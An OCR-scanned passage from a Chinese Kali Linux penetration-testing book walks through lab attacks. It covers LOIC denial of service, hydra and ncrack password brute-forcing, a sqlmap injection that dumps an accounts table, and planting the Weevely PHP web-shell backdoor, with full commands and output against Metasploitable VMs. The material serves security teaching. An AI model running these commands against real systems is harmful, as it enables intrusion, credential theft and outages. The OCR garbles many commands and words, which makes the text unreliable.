攻击 。 


Kali 包 含 几 个 称 为 应 力 测试 的 应 用 工具 ， 因 为 它们 模拟 服务 器 的 高 活性 负载 ， 评 估 它 如 何 应 付 额外 的 压力 。 如 果 服 务 器 或 它 
的 应 用 程序 失效 ， 那 么 它 就 遭受 了 DoS 攻 击 。 


因为 许多 工具 依赖 于 IPv4 的 系统 ， 所 以 无 法 处 理 新 的 IPv6 协 议 (denail6, dos-new-ip6, flood advertise6, =) 。 
然而 ， 最 成 功 的 DOS 攻击 工 具 一 一 低 轨 道 离子 炮 (Low Orbit lon Cannon, LOIC) ， 必 须 使 用 以 下 步骤 手动 添加 到 Kali: 


1. 使 用 apt-get install 命 令 ， 安 六 后 面 的 软件 包 及 其 依赖 环境 : mono-gmcs、mono-mcs、monodevelop 和 


liblog4netcil-dev, 


2. 从 GitHub 下 载 LOIC (https://github.com/NewEraCracker//downloads) 到 一 个 单独 的 文件 夹 。 使 用 unzip 命 令 解压 文 
件 。 


3. 导 航 到 该 文件 夹 ， 使 用 下 面 的 命令 编译 应 用 程序 : 


mdtool build 


4 .编译 好 的 应 用 程序 位 于 /<path>bin/Debug/LOIC.exe 目 录 。 
一 旦 输入 攻击 参数 ，LOIC 就 可 以 对 目标 网 站 发动 攻击 。 这 种 攻击 使 用 直观 的 GUI 界面 局 动 ， 如 图 9.18 所 示 。 


Low Orbit lon Cannon | U dun goofed | v. 1.1.1.25 LX 


IPC server Port Channel 
© anual Mode (Do it yourself) ai IPC Mode (Hiveldind) 6667 #oic Disconnected. 


| Lock on 
| Lock on 


— 1. Select your target 


NONE! 


—2, Attack options 
TCP | UDP message 
U dun gaoted 


HTTP Subsite | 
, 8D 10 9001 d Wait for reply 


<= faster Speed slower 三 > 


: ep Fd Use Gzip (HTTP) 
Append random chars to the subsite ! message ren TERES men A s 


Attack status 
Idle Connecting Pequesting Downloading Downloaded Requested 


github com iMevwErat rockeri kA 


49.18 DoS 攻击 工具 LOIC 


9.5 ”针对 特定 应 用 的 攻击 


针对 特定 应 用 的 攻击 ， 多 于 针对 特定 操作 系统 的 攻击 ; 当 人 们 考虑 到 锻 误 配置 、 漏 洞 和 逻辑 钳 误 可 能 影响 到 每 个 在 线 的 应 用 
时 ， 这 是 令 人 惊讶 的 ， 任 何 应 用 程序 都 可 以 被 认为 是 “安全 的 ”。 我 们 将 重点 介绍 一 些 对 Web 服 务 的 更 重要 的 攻击 。 


9.5.1 暴力 破解 访问 证 书 


一 个 对 网 站 或 其 服务 最 常见 的 初始 攻击 ， 是 针对 接 入 认证 猜测 的 用 尸 名 和 密码 穷 举 攻击 。 这 种 攻击 有 很 高 的 成 功率 ， 因 为 用 
户 往 往 选择 容易 记 住 的 凭据 或 重用 凭据 ， 并 且 系统 管理 员 经 单 不 控制 多 路 访问 兰 试 。 


Kali 配 备 了 hydra (一 个 命令 行 工 具 ) 和 hydra-GTK ( 它 有 一 个 GUI 界面 ) 。 这 两 种 工具 允许 测试 人 员 弯 力 或 重用 可 能 的 用 


户 名 和 密码 ， 以 攻击 特定 的 服务 。 多 种 通信 协议 支持 该 上 应用， 包括 FTP、FTPS、HTTP、HTTPS、ICQ、1IRC、LDAP、My9SQL、 
Oracle、POP3、PpcAnywhere、SNMP、SSH、VNC， 等 等 。hydra 使 用 蛮 力 攻击 判定 的 HTTP 页 面 访问 证 书 ， 如 图 9.19 所 示 。 


Hydra v7.5 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only 


Hydra (http://www.thc.org/thc-hydra) starting at 2013-12-30 03:55:38 

[DATA] 16 tasks, 1 server, 16899 login tries (l:129/p:131), -1056 tries per task 

[DATA] attacking service http-get on port 80 

[VERBOSE] Resolving addresses ... done 

[ATTEMPT] target 192.168.75.129 - login "default" - pass default" - 1 of 16899 [child O] 
[ATTEMPT] target 192.168.75.129 - Login "default" - pass " - 2 of 16899 [child 1] 
[ATTEMPT] target 192.168,75.129 - Login "default" - pass "test" - 4 of 16899 [child 2] 
[ATTEMPT] target 192.168.75.129 - login "default" - pass ‘testing - 5 of 16899 [child 3] 
[ATTEMPT] target 192.168.75.129 - Login "default" - pass password2" - 6 of 16899 [child 4] 
[ATTEMPT] target 192.168,.75.129 - login default - pass password - 8 of 16899 [child 5] 
[ATTEMPT] target 192.168.75.129 - login default" - pass Passwordl - 9 of 16899 [child 6] 


图 9.19 使 用 hydra 进 行 攻击 


95.2 ”数据 库 注入 攻击 曝光 


网 站 最 冲 见 并 且 可 利用 的 漏洞 是 注入 漏洞 ， 当 受害 者 网 站 不 监控 用 户 输入 ， 人 允许 攻击 者 与 后 台 系 统 进行 交互 时 ， 将 友 生 注入 
攻击 。 攻 击 者 可 以 通过 精心 设计 的 输入 数据 以 修改 或 从 数据 库 穷 取 内 容 ， 将 一 个 可 执行 软件 放 到 服务 器 上 ， 或 友 出 指令 给 操作 系 
统 。 


其 中 ， 评 估 SQL 注 入 漏洞 最 有 用 的 工具 是 一 个 sqlmap， 它 是 一 个 Python 工 具 ， 可 以 自动 开局 Firebird、MicrosoftSQL、 
MySQL, Oracle, PostgreSQL, Sybase, SAP MaxDB 数 据 库 的 侦 测 和 利用 。 


我 们 将 展示 针对 Mutilidae 数 据 库 的 SQL 注入 攻击 。 第 一 步 是 确定 Web 服 务 器 ， 后 台数 据 库 管理 系统 和 可 用 的 数据 库 。 


启动 Metasploitable 虚 拟 机 ， 并 访问 Mutillidae 网 站 。 完 成 后 ， 查 看 网 页 以 确定 一 个 接受 用 户 输入 的 页 面 ( 即 接收 用 户 名 和 
密码 的 页 面 ， 例 如 ， 远 程 用 户 登 录 的 表单 ) ; 这 些 页 面 可 能 容易 受到 SQL 注 入 攻击 。 然 后 打开 Kali， 并 在 命令 提示 符 下 输入 以 下 
AS (使 用 相应 的 目标 IP 地 址 ) : 

root@kali:~# sqlmap -u 
'http://192.168.75.129/mutillidae/index.php?page-user- 


info.php&username-admin&password-&user-info-php-submit- 
button=View+Account+Details' --dbs 


sqlmap 返 回 的 数据 如 图 9.20 所 示 。 


[13:32:56] [INFO] the back-end DBMS is MySQL 
web server operating system: Linux Ubuntu 8.04 (Hardy Heron) 
web application technology: PHP 5.2.4, Apache 2.2.8 
back-end DBMS: MySQL 5.6 


13:32:56] [INFU)] fetching database names 
available databases [/]: 
[*] dvwa 


[*] information schema 
[*] metasploit 

[*] mysql 

[*] owasplO 

[*] tikiwiki 

[*] tikiwikil95 


— 


KJ9.20 4% Fl sqlmapi& ©) Z 4€ 
最 有 可 能 用 来 存储 应 用 程序 的 数据 的 数据 库 是 owasp10 数 据 库 ， 因 此 ， 我 们 将 使 用 以 下 命令 检查 数据 库 的 所 有 表 项 : 


root@kali:~# sqlmap -u 
'http://192.168.75.129/mutillidae/index.php?page-user- 
info.php&username-admin&password-&user-info-php-submit- 
button=View+Account+Details' -D owasplO --tables 


执行 上 述 命令 后 返回 的 数据 如 图 9.21 所 示 。 


[13:53:07] [INFO] fetching tables for database: 'owasplO' 
Database: owasplO 
[6 tables] 


accounts | 
blogs table | 
captured data | 
credit cards | 
hitlog | 
pen test tools | 


— ee a ee ee UE REN eee ee pe eee eee 


图 9.21 显示 owasp10 数 据 库 表 项 


饿 列举 的 6 个 表 中 ， 一 个 的 标题 是 accounts。 我 们 将 试图 从 该 部 分 表 中 转 储 数据 。 如 果 成 功 ， 该 账号 先 据 也 将 使 我 们 返回 数 


据 库 ， 即 使 进一步 的 SQL 注 入 攻击 失败 。 为 了 转 储 凭据 ， 请 使 用 以 下 命令 : 


root@kali:~# sqlmap -u 
'http://192.168.75.129/mutillidae/index.php?page-user- 
info.php&username-admin&password-&user-info-php-submit- 
button=View+Account+Details' -D owasplO - T accounts --dump 


类 似 的 攻击 可 以 用 于 从 数据 库 中 提取 信用 卡 


Database: owasplO 
Table: accounts 
[16 entries] 


+----- +--------- -4+---------- +-------------- +----------------------------- + 
| cid | username | is admin | password | sis necune | 
R-----R---------- $+---------- R--------------R-------- ---------------2----- * 
| 1 | adii | TRUE | adminpass | Hankey’ | 
| 2 | adrian | TRUE | somepassword | Zombie Films Rock: | 
| 3 | john | FALSE | monkey | I like the smell of confunk | 
| 4 | jeremy | FALSE | password | d1373 1337 speak | 
| 5 | bryce | FALSE | password | I Love SANS | 
| 6 | samurai | FALSE | samurai | Carving Fools | 
| 3 | jim | FALSE | password | Jim Rome is Burning | 
| 8 | bobby | FALSE | password | Hank is my dad | 
| 9 | simba | FALSE | password | I am a cat | 
| 18 | dreveil | FALSE | password | Preparation H | 
| ll | scotty | FALSE | password | Scotty Do | 
| i2 | cal | FALSE | password | Go Wildcats | 
| 13 | john | FALSE | password | Do the Duggie! | 
| 14 | kevin | FALSE | 42 | Doug Adams rocks | 
| 15 | dave | FALSE | set | Bet on S.E.T. FIW | 
| 16 | ed | FALSE | pentest | Commandline KungFu anyone? | 
fee espe ee eee eee 中 = 一 一 一 一 一 一 一 一 一 > 站 = 一 一 一 中 = 一 = 一 一 = + 


图 9.22 ”执行 上 述 命令 


9.6 ”使 用 网 站 后 | 维持 访问 


一 旦 入 侵 一 台 Web 服 务 器 及 其 服务 ， 最 重要 的 任务 束 是 确保 可 以 维持 安全 访问 。 这 通 党 借助 于 一 个 网 络 外 过 小 程序 来 提供 
隐身 后 门 进入 ， 并 人 允许 使 用 系统 命令 ， 以 万 便 进 行 后 期 利用 活动 。 


Kali 附 带 了 几 个 Web Shell。 在 这 里 ， 我 们 将 使 用 流行 的 PHP 网 络 外 壳 小 程序 Weevely。 


Weevely 模 拟 一 个 远程 会 话 ， 并 人 允许 测试 者 或 攻击 者 利用 超过 30 个 模块 进行 后 期 开 友 利用 ， 包 括 以 下 优势 : 


浏览 目标 文件 系统 。 

-从 受 感染 的 系统 进行 文件 传输 。 

.对 执行 审计 的 通用 服务 器 配置 错误 。 

通过 目标 系统 暴力 破解 SQL 账 己 。 

:产生 逆向 TCP 外 壳 。 

-在 已 被 侵入 的 远程 系统 上 执行 命令 ， 即 使 已 应 用 PHP 的 安全 性 限制 。 


最 后 ，Weevely 努 力 隐 藏 HTTP cookies 以 逃避 侦察 。 要 创建 Weevely， 从 命令 提示 答 下 输入 以 下 命令 : 


root@kali:~# weevely generate «password» <path> 


这 将 在 根 目 录 下 创建 文件 weevely.php。 在 已 被 侵入 的 远程 系统 上 执行 命令 ， 即 使 已 应 用 PHP 的 安全 性 限制 ; 执行 weevely 
的 结果 如 图 9.23 所 示 。 


使 用 文件 上 传 漏洞 或 其 他 任何 入 侵 点 ， 包 括 提供 访问 meterpreter 进 行文 件 上 传 的 功能 ， 上 传 weevely.php 到 委 感 染 的 网 
Wh. 


root@kali:~# weevely 


| v1.08 
Stealth tiny web shell 
[+] Start ssh-Like terminal session 
waevely «url <password> 
[+] Run command directly from command Line 
weevely <url> «password» | "<commanc> .." | :<module> .. ] 


[+] Ganerate PHP backdoor 
weevely generate «password- [ «pathn- | 


[+] Show credits 
weevely credits 


[+] Shew available module and backdoor generators 
waevely help 


roolükali:- weevely generate digltaldefence 
[generate .php] Backdoor Tile "weaevely.php- created with password ‘digitalderance | 


图 9.23 ”执行 Weevely 的 结果 


要 与 网 络 外 壳 进 行 通信 ， 从 命令 提示 符 输 入 以 下 命令 ， 以 确保 目标 的 地 址 、 目 录 和 密码 变量 被 改变 ， 以 反映 出 那些 被 感染 的 
系统 : 


root@kali:~# weevely http://<target IP address> <directory> 
<password> 


在 图 9.24 所 示 的 例子 中 ， 我 们 已 经 证 实 ， 使 用 whoami 命 令 (标识 正确 的 目录 ) 连接 到 了 网 络 外 这， 使 用 ls 命令 来 获取 一 个 
文件 列表 (这 再 次 证 实 了 源 网 络 外 壳 连 接 到 了 weevely.php) 。 用 cat/etc/password 命 令 来 查看 密码 。 


www -data@:/var/www/dvwa/hackable/upLoads $ whoami 
www-data 

www-data@:/var/www/dvwa/hackable/upLoads $ Ls 
dvwa email .png 

weeyely.php 

www -data(:/var/www/dvwa/hackable/uploads $ cat /etc/passwd 
root :x:0:0:root:/root :/bin/bash 
daemon:x:1:1:daemon:/usr/sbin:/bin/sh 
Din:x:Z:7:Din:/bin:/bin/sh 
Sys:x:3:3:sys:/dev:/bin/sh 

sync :x:4:65534:sync : /bin:/bin/sync 
games:x:5:60:games : /usr/games : /bin/sh 
man:x:5:12:man:/var/cache/man: /bin/sh 
lp:x:/:7:1p:/va-^/spool/lpd:/bin/sh 
mail:x:8:8:mail:/var/mail:/bin/sh 


图 9.24 ”执行 WZhoami、1s 等 命令 


网 络 外 过 也 可 以 用 来 建立 一 个 反 同 外 过， 连接 返回 到 测试 器 ， 使 用 任 一 Netcat 的 或 Metasploit 的 框架 作为 本 地 侦 听 器 。 


9.7 WME 
在 本 章 中 ， 我 们 研究 了 网 站 以 及 服务 ， 本 章 提供 了 从 攻击 者 的 角度 来 看 授权 用 户 的 服务 。 我 们 以 杀 链 的 角度 来 看 Web 服 
务 ， 目 的 是 了 解 侦 察 和 漏洞 扫描 的 正确 应 用 。 


我 们 展现 了 几 种 不 同 的 漏洞 扫 摘 器 ; 专注 于 制作 和 使 用 修改 现 有 的 扫 摘 器 ， 以 广 持 网 站 和 网 络 服务 评估 ， 使 用 基于 浏览 器 的 
漏洞 扫 摘 器 ， 并 且 它 们 是 专门 设计 来 评估 网 站 及 其 服务 的 漏洞 扫 摘 器 。 只 对 少数 漏洞 进行 了 回顾 ， 本 章 最 后 介绍 了 一 种 专门 针对 
网 络 服务 的 网 络 外 壹 的 检查 。 


在 下 一 章 中 ， 我 们 将 学 习 如 何 识别 和 攻击 用 户 连 接 到 Web 服 务 的 远程 访问 通信 。 


第 10 章 ”利用 远程 访问 通信 


在 第 9 章 中， 我们 采用 了 杀 链 方法 攻击 基于 Web 的 应 用 程序 。 我 们 对 侦察 、 漏 洞 扫 摘 和 那 蔡 针对 网 址 和 其 他 应 用 程序 的 特殊 
利用 方法 进行 了 介绍 。 同 时 我 们 也 对 那些 评估 Web 应 用 程序 所 需 的 独特 工具 进行 了 人 研究， 特别 是 客 尸 端 代理 和 已 开 友 的 工具 ， 
AIR. 


在 本 章 中 ， 我 们 将 关注 在 互联 网 上 已 经 广泛 传播 的 ， 入 侵 远 程 访问 通信 的 设备 和 应 用 程序 。 


攻击 者 可 以 利用 远程 访问 通信 的 普遍 性 实现 以 下 目标 : 


-利用 已 有 的 通信 信道 ， 获 取 对 目标 系统 的 直接 远程 访问 。 


-截获 通信 信息 。 


-拒绝 已 经 通过 里 份 认证 的 用 户 获 得 常规 通 


— 


言 ， 且 迫使 他 们 使 用 容易 受到 其 他 攻击 的 不 安全 的 信道 。 


由 于 大 多 数 用 尸 认为 他 们 使 用 的 通信 工具 是 “安全 ”的 (尽管 银行 使 用 SSL 协 议 来 确保 网 上 银行 的 安全 性 ) ， 这 些 攻击 可 以 
在 已 经 被 破 坏 的 通信 和 受害 者 信任 的 其 他 在 线 通 信 上 产生 重大 影响 。 


本 草 将 天 注 属于 远程 访问 通信 的 侦察 和 杀 链 的 利用 阶段 。 像 战争 拨号 、 语 畜 IP 和 相关 电话 问题 、 专 业 之 等 高 度 专 用 的 系统 以 
及 复杂 应 用 程序 等 不 是 本 书 所 介绍 的 主题 。 


通过 本 章 ， 你 可 以 学 到 如 下 知识 : 


-利用 操作 系统 通信 协议 (RDP 和 SSH) 。 

-利用 远程 访问 应 用 程序 (VNC) 。 

.为 安全 套 接 字 层 版 本 2 扫描 配置 Kali。 

安全 套 接 字 层 的 侦察 和 利用 ， 包 括 中 间 人 和 DoS 攻 击 。 
攻击 一 个 虚拟 专用 网 络 。 


10.1 利用 操作 系统 通信 协议 
一 些 协 议 可 以 不 受阻 碍 地 传输 访问 赁 证 (如 Telnet 和 FTP) 。 使 用 一 个 如 Wireshark 的 包 嗅 探 器 ， 攻 击 者 即 可 截获 并 重用 该 
凭证 。 


然而 ， 大 多 数 远 程 访问 协议 ， 尤 其 是 那些 苔 入 操作 系统 的 ， 现 在 均 受 访 问 控制 和 加 密 的 保护 。 昌 然 这 在 一 定 程度 上 增加 了 安 
全 性 ， 但 它们 仍然 可 能 受到 由 于 配置 错误 ,或 弱 加 密 密 钥 的 使 用 ， 所 产生 的 攻击 。 本 草 我 们 将 检查 可 以 被 用 来 破解 所 谓 安全 通信 
信道 的 其 他 风险 。 


10.1.1 ”破解 远程 昌 面 协议 


远程 桌面 协议 (Remote Desktop Protocol, RDP) 是 一 个 微软 通信 专 有 协议 ， 它 允许 客户 机 与 另 一 人 台 使 用 图 形 界面 的 计 
算 机 连接 。 虽 然 协议 是 加 密 的 ， 但 如 果 攻 击 者 可 以 猜 得 用 户 名 和 密码 ， 束 可 以 访问 该 服务 器 。 


\ 吹 全 应 该 注意 的 是 ， 最 常见 的 RDP 的 入 侵 是 在 社会 工程 学 中 使 用 的 。 远 程 服务 技术 员 联系 用 户 ， 并 说 服用 户 他 们 需要 远程 访问 用 户 的 系统 ， 
并 在 系统 上 解决 某 些 问题 。 现 在 ， 攻 击 目标 的 RDP 协 议 的 恶意 软件 也 变 得 越 来 越 普 遍 了 。 


从 测试 者 (或 攻击 者 ) 的 角度 来 看 ， 破 解 目标 RDP 服 务 的 第 一 步 是 定位 该 RDP 服 务 器 ， 并 确定 它 所 使 用 的 密码 所 具有 的 强度 
特征 。 这 个 侦察 通 剃 使 用 nmap 等 工具 进行 引导 ， 并 祝 配 置 成 标准 的 RDP 扫 摘 闯 口 ， 冰 口 号 为 3389。 


现在 的 nmap 工 具 ， 包 含 提供 RDP 附 加 详细 信息 的 专用 脚本 ， 其 中 包括 加 密 的 配置 。 如 果 时 | 间 人 允许， 并 且 隐 身 行动 不 是 一 个 
重要 问题 ， 这 些 都 应 该 在 初始 扫 摘 阶段 被 使 用 。 命 令 行 调用 枚 举 支 持 加 密 协议 的 脚本 如 下 : 


root@kali:~# nmap - p 3389 --script rdp-enum-encryption <IP> 


前 面 命令 的 执行 结果 如 图 10.1 所 示 。 


root@kali:~# nmap -p 3389 --script rdp-enum-encryption 


Starting Nmap 6.40 ( http://nmap.org ) at 2014-01-01 21:11 EST 
Nmap scan report for 

Host is up (0.020s Latency). 

PORT STATE SERVICE 

3389/tcp open ms-wbt-server 

| rdp-enum-encryption: 

| security layer 

| CredSSP: SUCCESS 

| Native RDP: SUCCESS 

| SoL: SULLESO 

| RDP Encryption Level: Client Compatible 
| 40-bit RC4: SUCCESS 

| 56-bit RC4: SUCCESS 

| 128-bit RC4: SUCCESS 

m FIPS 140-1: SUCCESS 


Nmap done: 1 IP address (1 host up) scanned in 3.71 seconds 


10.1 运行 map 查 看 RDP 信 息 
一 些 RDP 漏 洞 已 经 和 被 确定 (特别 是 MS12-020) ， 而 这 些 漏洞 可 以 被 精心 设计 的 数据 包 远 程 使 用 。 
使 用 合适 的 nmap 脚 本 ， 通 过 调用 如 下 命令 行 ， 可 以 确定 当前 版 本 的 RDP 是 否 含有 漏洞 : 


root@kali:~# nmap -sV -p 3389 --script rdp-vuln-ms12-020 
< IP> 


上 述 命令 的 执行 结果 如 图 10.2 所 示 。 


root@kali:~# nmap -sV -p 3389 --script rdp-vuln-ms12-020 192.168.75.128 


Starting Nmap 6.40 ( http://nmap.org ) at 2014-02-1/ 15:50 EST 

Nmap scan report for 192.168.75.128 

Host is up (0.00035s latency). 

PORT SIATE SERVICE VERSION 

3389/tcp open ms-wbt-server Microsoft Terminal Service 

| rdp-vuln-ms12-020: 

| VULNERABLE : 

| MS12-020 Remote Desktop Protocol Denial Of Service Vulnerability 

| State: VULNERABLE 

| IDs: CVE:CVE-2012-0152 

| Risk factor: Medium  CVSSv2: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:N/A 
:P) 

| Description: 

| Remote Desktop Protocol vulnerability that could 
allow remote attackers to cause a denial of service. 


图 10.2 ”运行 nmap 确 定 RDP 是 否 含 有 漏洞 


一 旦 使 用 nmap 确 定 了 系统 漏洞 ， 就 可 以 被 Metasploit 框 架 下 的 auxiliary/dos/windows/rdp/ms12 020 maxchannelids 


模块 利用 ， 进 而 导致 拒 绝 服务 攻击 。 


最 党 见 的 破解 RDP 的 方法 是 根据 一 本 最 常见 的 用 尸 名 和 密码 的 字典 〈 也 可 以 是 根据 目标 特点 ， 使 用 工具 如 CeWL 和 crunch， 
构造 针对 目标 的 特定 字典 ， 暴 力 破 解 使 用 这 些 字 典 ， 比 尝试 使 用 通用 字典 更 快 、 更 为 隐秘 ， 因 为 它们 产生 的 网 络 流量 更 少 ) 使 用 
暴力 攻击 。 


Kali 提 供 了 一 些 暴 力 破解 工具 ， 包 括 hydra、medusa、ncrack 和 patator。 通 过 测试 ， 我 们 发 现 ， 融 速度 和 效率 而 


言 ，ncrack 是 最 可 靠 的 。 


SA 个 来 源 列 出 的 常见 用 户 名 和 密码 都 是 可 用 的 。 大 多 数 破解 工具 ， 特 别 是 nydra、ncrack 和 john (John the Ripper) ， 包 括 在 应 用 
程序 主 目录 的 列表 中 。 测 试 人 员 也 可 以 从 网 上 下 载 各 种 类 型 的 列表 。 从 破解 的 用 户 账户 产生 的 列表 是 最 有 用 的 ， 因 为 它们 反映 了 现实 世界 使 用 
的 身份 认证 信息 。 不 管 你 使 用 什么 样 的 列表 ， 你 可 能 希望 通过 添加 现任 和 前 任 员 工 的 名 字 ( 用 户 名 )〉 ， 或 使 用 如 CeWIi 的 工具 创建 的 单词 列表 
把 测试 人 性 化 ，CewL 可 以 爬 入 目标 网 站 并 创建 固定 长 度 的 单词 。 


ncrack 是 一 种 支持 FTP、HTTP (S) 、POP3、RDP、SMB、SSH、Telnet 和 VNC 协 议 的 高 速 验证 破解 工具 。 它 从 终端 窗口 
做 调用 ， 使 用 以 下 合 令 : 


root@kali:~# ncrack -vv -U user.lst -P password.list 
<Taget IP>:<Target Port> 


上 述 命令 的 执行 结果 如 图 10.3 所 示 。 
root@kali:~# ncrack -vv -U user.lst -P password.lst 192.168.200.128:3389 
starting Ncrack O.4ALPHA ( http://ncrack.org ) at 2014-01-01 23:17 ESI 


rdp://192.168.200.128:3389 Valid credentials, however, another user is currently 
logged on. 

Discovered credentials on rdp://192.168.200.128:3389 ‘admin | adminl23' 
rdp://192.1658,200.128:3389 Valid credentials, however, another user is currently 
logged on. 

Discovered credentials on rdp://192.168.200.128:3389 'rwbeggs' 'darkstar' 
rdp://192.168,200.128:3389 Valid credentials, however, another user is currently 
logged on. 

Discovered credentials on rdp://192.168.200.128:3389 'DigitalDefence' 'darkstar 
rdp://192.168,200.128:3389 Valid credentials, however, another user is currently 
logged on. 

Discovered credentials on rdp://192.168.200.128:3389 'mfarrell' 'daisyduke' 
rdp://192.168,200.128;3389 finished. 


Discovered credentials for rdp on 192.168.200.128 3389/tcp: 
197.168.200.128 3389/tcp rdp: admin 'adminl123' 
192.168.200.128 3389/tcp rdp: 'rwbeggs' 'darkstar' 
192.168.200.128 33898/tcp rdp: 'DigitalDefence' 'darkstar: 
192.168.200.126 3389/tcp rdp: 'mfarrell  daisyduke' 


Ncrack done: 1 service scanned in 1669.37 seconds. 
Probes sent: 21950 | timed-out: 13 | prematurely-closed: O 


Ncrack finished. 


EJ10.3 ”运行 nctack-vv-U 命 令 


ncrack 工 具 可 以 在 大 约 1700 秒 内 友 现 所 有 用 户 的 访问 赁 证。 然而， 所 需 的 时 间 量 将 取决 于 所 使 用 的 字典 的 整体 大 小 ， 以 及 
在 一 个 成 功 访问 之 前 必须 进行 的 猜测 次 数 。 


10.1.2 ”破解 安全 外 过 


安全 外 壳 (SSH) 协议 ， 是 一 种 用 于 在 服务 器 和 客 尸 机 之 间 的 开放 网 络 上 ， 建 立 加 密 信道 的 网 络 协议 。 通 剃 ， 一 个 公私 密 钥 
对 人 允许 用 尸 在 不 需要 口令 的 情况 下 登录 a 到 一 个 系统 。 公 钥 保 存在 所 有 需要 安全 连接 的 系统 上 ， 然 而 ， 用 尸 保 存 私 钥 。 身 份 认证 是 
基于 私 钥 的 ;SSH 根据 相应 的 公 钥 验证 私 钥 。 在 目标 系统 上 ， 公 和 钥 是 由 远程 访问 系统 所 允许 的 授权 密 钥 来 验证 的 。 当 公 钥 密码 强 
度 不 够 ， 且 可 以 猜 到 时 ， 这 种 所 谓 的 安全 通信 信道 将 是 不 安全 的 。 


像 RDP 一 样 ，SSH 的 一 个 弱点 是 容易 受到 用 户 猜测 访问 凭证 的 暴力 攻击 。 对 于 这 种 特定 的 情况 ， 我 们 将 使 用 hydra 工 具 。 
hydra 可 能 是 最 古老 的 暴力 工具 ， 且 被 认为 是 功能 最 丰富 的 工具 。 它 还 支持 攻击 大 量 的 目标 协议 。 


hydra 工 具 可 以 通过 导航 一 一 Kali Linux|Password Attacks|Online Attacks 来 发 现 ， 它 也 可 以 直接 从 命令 行 被 调用 。hydra 
有 两 个 版 本 : 命令 行 版 本 (hydra) 和 GUI 版 本 (hydra-gtk) 。 对 于 这 个 示例 ， 我 们 从 命令 行 调用 hydra， 使 用 以 下 命令 : 


root@kali:~# hydra -s 22 -v -V -L <file path/name> 
-P <file path/name> -t 8 <Target IP><protocol> 


命令 的 参数 摘 述 如 下 : 

.-s 指 定 使 用 的 端口 号 。 尽 管 当 默 认 端 口 被 使 用 时 ， 它 不 需要 被 输入 ， 但 它 可 用 来 消除 歧义 ， 因 为 ， 在 这 种 情况 下 ， 它 可 以 加 速 测试 。 
.-v 和 -V 选 择 最 大 宛 长 的 报告 。 

.选择 登录 或 用 户 名 文件 。 

._P 选 择 口令 文件 ， 

.二 选择 并 行 任务 或 连接 的 数量 。 数 量 越 大 ， 测 试 越 快 。 然 而 ， 如 果 数 目 过 高 ， 可 能 引入 错误 ， 而 且 正确 的 密码 将 会 丢失 。 


10.4 展 示 了 最 初 暴力 攻击 的 详细 输出 。 


root@kali:~# hydra -s 22 -v -V -L /root/user.lst -P /root/password.lst -t 8 192.168.75.128 ssh 
Hydra v/.6 (c)2013 by van Hauser/TIHC & David Maciejak - for legal purposes only 


Hydra (http://www.thc.org/thc-hydra) starting at 2014-01-09 03:02:34 


[DATA] 8 tasks, 1 server, 128 login tries (1:8/p:165), -15 tries per task 

[DATA] attacking service ssh on port 22 

[VERBOSE] Resolving addresses ... done 

[ATTEMPT] target 192.168.75.128 - login "admin" - pass "123" - 1 of 128 [child 0] 
[ATTEMPT] target 192.168.75.128 - login "admin" - pass "1234" - 2 of 128 [child 1] 
[ATTEMPT] target 192.168.75.128 - login "admin" - pass "12345" - 3 of 128 [child 2] 
[ATTEMPT] target 192.168.75.128 - login "admin" - pass "123456" - 4 of 128 [child 3] 
[ATTEMPT] target 192.168.75.128 - login "admin" - pass "letmein" - 5 of 128 [child 4] 
[ATTEMPT] target 192.168./5.128 - Login “admin” - pass “qwerty” - 6 of 128 [child 5| 


10.4 ”运行 hydta 攻 击 的 详细 输出 


当 使 用 字典 成 功 登 录 时 ，hydra 记 录 闯 口 、 协 议 、 主 机 和 登录 凭证 。 然 后 继续 使 用 字典 确定 其 他 可 能 的 账户 。 在 图 10.5 的 最 
上 面 一 行 ，hydra 已 经 用 登录 名 DigitalDefence 和 登录 密码 darkstar 正 确 识别 了 一 个 SSH 账 户 ; 图 10.5 也 显示 了 其 他 的 党 
试 ，hydra 试 图 确定 其 他 的 附加 账户 。 


22][ssh] host: 192.168.75.12 login: DigitalDefence password: darkstar 

[ATTEMPT] target 192.168./5.128 - Login "msfadmin' pass "123" - 113 of 128 [child 5] 
[ATTEMPT] target 192.168./5.128 - login "msfadmin" pass "1234" - 114 of 128 [child 5] 
[ATTEMPT] target 192.168.75.128 - login "msfadmin" pass "12345" - 115 of 128 [child 5] 
[ATTEMPT] target 192.168.75.128 - login "msfadmin" pass "123456" - 116 of 128 [child 5] 
[ATTEMPT] target 197.168./5.128 - Login "msfadmin' pass “letmein - 11/ of 128 [child 5] 
[ATTEMPT] target 192.168./5.128 - login "msfadmin" pass "qwerty" - 118 of 128 [child 5] 
[ATTEMPT] target 192.168.75.128 - login "msfadmin" - pass 'qwerty123" - 119 of 128 [child 5] 
[ATTEMPT] target 192.168.75.128 - login "msfadmin" pass "admin" - 128 of 128 [child 1] 
[ATTEMPI] target 192.168./5.128 - login "msfadmin" pass "adminl23" - 121 of 128 [child 1] 
[ATTEMPT] target 192.168./5.128 - Login "msfadmin" pass "darkstar" - 122 of 128 [child 1] 
[ATTEMPT] target 192.168.75.128 - login "msfadmin" pass "daisyduke" - 123 of 128 [child 1] 
[ATTEMPT] target 192.168.75.128 - login "msfadmin" pass "pwd" - 124 of 128 [child 1] 
[ATTEMPT] target 192.158./5.128 - Login "msfadmin' pass "password" - 125 of 128 [child 1] 
[ATTEMPT] target 192.168./5.128 - login "msfadmin" pass "passwordl123" - 126 of 128 [child 1] 
[ATTEMPT] target 192.168.75.128 - login "msfadmin" pass "test" - 127 of 128 [child 6] 
[ATTEMPT] target 192.168.75.128 - login "msfadmin" - pass "testtest" - 128 of 128 [child 0] 
[STATUS] attack finished for 192.168./5.178 (waiting for children to complete tests) 

l of 1 target successfully completed, 1 valid password found 
Hydra (http://www.thc.org/thc-hydra) finished at 2014-01-09 03:02:57 


rouiga i n ame 


图 10.5 “hydra 使 用 字典 攻击 
如 果 你 知道 密码 配置 ， 你 也 可 以 让 hydra 用 以 下 命令 在 忙碌 时 自动 创建 密码 列表 : 


root@kali:~# hydra -L user.lst -V -x 6:8:aAl <IP address> SSH 


对 前 面 售 令 中 所 使 用 参数 ， 描 述 如 下 : 
-x 指导 hydra 自 动 创建 在 暴力 攻击 中 使 用 的 密码 。 密 码 将 根据 -x 后 的 参数 创建 。 
6: 8 表明 最 小 密码 长 度 为 6 个 字符 ， 最 大 密码 长 度 为 8 个 字符 。 


aaA1 将 使 用 字母 和 数字 的 组 合 目 动 创建 密码 。 它 使 用 所 有 的 小 写字 母 〈 比 如 a) 、 


